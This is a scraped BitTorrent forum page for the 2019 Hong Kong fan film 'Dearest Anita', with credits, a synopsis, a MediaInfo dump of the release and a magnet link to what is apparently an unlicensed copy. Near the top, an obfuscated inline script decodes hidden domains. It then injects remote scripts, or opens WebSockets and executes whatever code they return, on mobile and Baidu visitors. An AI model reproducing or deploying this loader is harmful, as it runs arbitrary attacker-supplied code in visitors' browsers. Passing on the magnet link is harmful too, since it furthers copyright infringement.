梅艳芳菲[国粤语音轨/中文字幕].Dearest.Anita.2019.1080p.BluRay.x264.DTS.2Audio-迅雷下载 4.99GB

版主小s 14天前 250

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x5a\x7a\x72\x64\x63\x78\x64\x57\x4c\x41']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 梅艳芳菲 / 朝花夕拾.芳华绝代 / Dearest Anita

◎片 名 拾芳

◎年 代 2019

◎产 地 中国香港

◎类 别 传记

◎语 言 粤语

◎上映日期 2020-08-25(中国大陆) / 2019-01-03(中国香港)

◎IMDb链接 https://www.imdb.com/title/tt9581518/

◎豆瓣评分 6.5/10 (2271人评价)

◎豆瓣链接 https://movie.douban.com/subject/30353078/

◎片 长 85分钟

◎导 演 高志森 Clifton Ko (id:1281025)

梁柏豪 Pako Leung (id:1403100)

◎编 剧 芳心荟 Mui Nation (id:1411912)

徐咏珊 Tsui Wing Shan (id:1411908)

许晋邦 Hui Jim (id:1411911)

朱智立 Zhu Zhili (id:1411909)

◎演 员 胡杏儿 Myolie Wu (id:1043040)

郭羡妮 Sonija Kwok (id:1217936)

林德信 Alex Lam (id:1336855)

方惠盈 Yuki Fong (id:1411916)

黄容杰 Paris Wong (id:1411917)

曾江 Kenneth Tsang (id:1275451)

吴耀汉 Richard Ng (id:1037408)

邵音音 Yin-Yin Shaw (id:1297367)

韩马利 Mary Hon Ma-Li (id:1321672)

刘雅丽 Alice Lau (id:1274633)

江欣燕 Elvina Kong (id:1104138)

恭硕良 Jun Kung (id:1275254)

龚慈恩 Mimi Kung (id:1313657)

田启文 Kai Man Tin (id:1315882)

邓建明 Joey Tang (id:1407401)

郑子诚 Tse-sing Cheng (id:1316264)

杨英伟 Ying Wai Yeung (id:1348398)

余慕蓮 Mo-Lin Yu (id:1345424)

曾志伟 Eric Tsang (id:1002862)

万梓良 Alex Man (id:1023948)

路芙 Ruth Tsang (id:1429001)

陈彦珲 Yen Hue Tan (id:1411918)

冯耀通 Yiu Tong Vincent Fung (id:1411919)

◎标 签 梅艳芳 / 香港 / 传记 / 香港电影 / 纪录片 / 温情 / 音乐 / 感人

◎简 介

《梅艳芳菲》是梅艳芳的粉丝为了纪念这位百变天后而花了八年的时间和心血拍摄的纪念电影。影片从粉丝们在垃圾柜里捡回被当做垃圾扔掉的梅艳芳的遗物和一众粉丝写给梅姐的信开始,从而带出这位偶像生前对人的真挚情义……

  1. General

  2. Unique ID : 331587580462155508840297901869150143228 (0xF97571EE227E25312139A071213E82FC)

  3. Complete name : [email protected].mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 4.99 GiB

  7. Duration : 1 h 24 min

  8. Overall bit rate : 8 429 kb/s

  9. Movie name : Dearest Anita - Blu-ray?

  10. Encoded date : UTC 2021-07-10 09:18:08

  11. Writing application : mkvmerge v58.0.0 ('Supper's Ready') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  13. Cover : Yes

  14. Attachments : WenQuanWeiMiHei-1.ttf / cover.jpg


  15. Video

  16. ID : 1

  17. Format : AVC

  18. Format/Info : Advanced Video Codec

  19. Format profile : [email protected]

  20. Format settings : CABAC / 4 Ref Frames

  21. Format settings, CABAC : Yes

  22. Format settings, Reference frames : 4 frames

  23. Codec ID : V_MPEG4/ISO/AVC

  24. Duration : 1 h 24 min

  25. Bit rate : 5 379 kb/s

  26. Width : 1 920 pixels

  27. Height : 804 pixels

  28. Display aspect ratio : 2.40:1

  29. Frame rate mode : Constant

  30. Frame rate : 24.000 FPS

  31. Color space : YUV

  32. Chroma subsampling : 4:2:0

  33. Bit depth : 8 bits

  34. Scan type : Progressive

  35. Bits/(Pixel*Frame) : 0.145

  36. Stream size : 3.18 GiB (64%)

  37. Writing library : x264 core 164 r3065+55M 280faca t_mod_New [(8 & 10)[email protected] X86_64]

  38. Encoding settings : cabac=1 / ref=4 / deblock=1:-3:-3 / analyse=0x3:0x133 / me=umh / subme=11 / psy=1 / fade_compensate=0.00 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=48 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-3 / threads=24 / lookahead_threads=6 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=11 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=1 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=72 / rc=crf / mbtree=0 / crf=17.0000 / qcomp=0.65 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / vbv_maxrate=62500 / vbv_bufsize=78125 / crf_max=0.0 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / pb_ratio=1.30 / aq=3:0.80 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0

  39. Default : Yes

  40. Forced : No


  41. Audio #1

  42. ID : 2

  43. Format : DTS

  44. Format/Info : Digital Theater Systems

  45. Codec ID : A_DTS

  46. Duration : 1 h 24 min

  47. Bit rate mode : Constant

  48. Bit rate : 1 510 kb/s

  49. Channel(s) : 6 channels

  50. Channel layout : C L R Ls Rs LFE

  51. Sampling rate : 48.0 kHz

  52. Frame rate : 93.750 FPS (512 SPF)

  53. Bit depth : 24 bits

  54. Compression mode : Lossy

  55. Stream size : 915 MiB (18%)

  56. Title : Mandarin

  57. Language : Chinese

  58. Default : Yes

  59. Forced : No


  60. Audio #2

  61. ID : 3

  62. Format : DTS

  63. Format/Info : Digital Theater Systems

  64. Codec ID : A_DTS

  65. Duration : 1 h 24 min

  66. Bit rate mode : Constant

  67. Bit rate : 1 510 kb/s

  68. Channel(s) : 6 channels

  69. Channel layout : C L R Ls Rs LFE

  70. Sampling rate : 48.0 kHz

  71. Frame rate : 93.750 FPS (512 SPF)

  72. Bit depth : 24 bits

  73. Compression mode : Lossy

  74. Stream size : 915 MiB (18%)

  75. Title : Cantonese

  76. Language : Chinese

  77. Default : No

  78. Forced : No


  79. Text #1

  80. ID : 4

  81. Format : ASS

  82. Codec ID : S_TEXT/ASS

  83. Codec ID/Info : Advanced Sub Station Alpha

  84. Duration : 1 h 23 min

  85. Bit rate : 110 b/s

  86. Count of elements : 1501

  87. Compression mode : Lossless

  88. Stream size : 67.7 KiB (0%)

  89. Title : chs

  90. Language : Chinese

  91. Default : Yes

  92. Forced : No


  93. Text #2

  94. ID : 5

  95. Format : ASS

  96. Codec ID : S_TEXT/ASS

  97. Codec ID/Info : Advanced Sub Station Alpha

  98. Duration : 1 h 23 min

  99. Bit rate : 110 b/s

  100. Count of elements : 1501

  101. Compression mode : Lossless

  102. Stream size : 67.7 KiB (0%)

  103. Title : cht

  104. Language : Chinese

  105. Default : No

  106. Forced : No


  107. Text #3

  108. ID : 6

  109. ID in the original source medium : 4609 (0x1201)

  110. Format : PGS

  111. Muxing mode : zlib

  112. Codec ID : S_HDMV/PGS

  113. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  114. Duration : 1 h 23 min

  115. Bit rate : 46.0 kb/s

  116. Count of elements : 2379

  117. Stream size : 27.6 MiB (1%)

  118. Title : eng

  119. Language : English

  120. Default : No

  121. Forced : No

  122. Original source medium : Blu-ray


  123. Menu

  124. 00:00:00.000 : Chapter 01

  125. 00:04:08.583 : Chapter 02

  126. 00:11:23.500 : Chapter 03

  127. 00:18:16.000 : Chapter 04

  128. 00:26:49.000 : Chapter 05

  129. 00:36:27.458 : Chapter 06

  130. 00:43:57.250 : Chapter 07

  131. 00:52:54.416 : Chapter 08

  132. 00:59:16.333 : Chapter 09

  133. 01:06:06.166 : Chapter 10

  134. 01:13:26.375 : Chapter 11

  135. 01:19:01.750 : Chapter 12


TAGS 传记

磁力链:
  • magnet:?xt=urn:btih:BF5A3FFAB48982B24073F57C43E3485625FEB431
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回